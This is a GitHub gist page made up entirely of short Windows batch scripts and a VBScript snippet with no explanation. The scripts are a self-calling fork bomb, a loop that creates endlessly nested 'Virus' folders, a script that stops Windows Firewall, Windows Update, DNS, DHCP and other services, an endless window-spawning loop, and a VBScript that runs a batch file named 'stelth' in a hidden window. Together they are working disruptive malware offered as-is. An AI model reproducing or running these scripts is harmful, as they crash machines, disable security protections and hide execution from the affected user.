Skip to content

Instantly share code, notes, and snippets.

@bhupatisg
Created January 11, 2021 09:40
Show Gist options
  • Save bhupatisg/bbec356b811de599631caeec15cf0d17 to your computer and use it in GitHub Desktop.
Save bhupatisg/bbec356b811de599631caeec15cf0d17 to your computer and use it in GitHub Desktop.
@echo off
:loop
Explorer
Call forkBomb.bat
Goto loop
cd\
cd C:\Users\username\Desktop
:loop
md Virus
cd Virus
goto loop
@echo off
net stop "Windows Firewall"
net stop "Windows Update"
net stop Workstation
net stop "DHCP Client"
net stop "DNS Client"
net stop "Print Spooler"
net stop Themes
exit
@echo off
:loop
start
start
start
start
start
start
start
start
start
goto loop
set objShell = CreateObject("WScript.Shell")
strCommand = "C:\stelth.bat"
objShell.Run strCommand, vbHide, TRUE
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment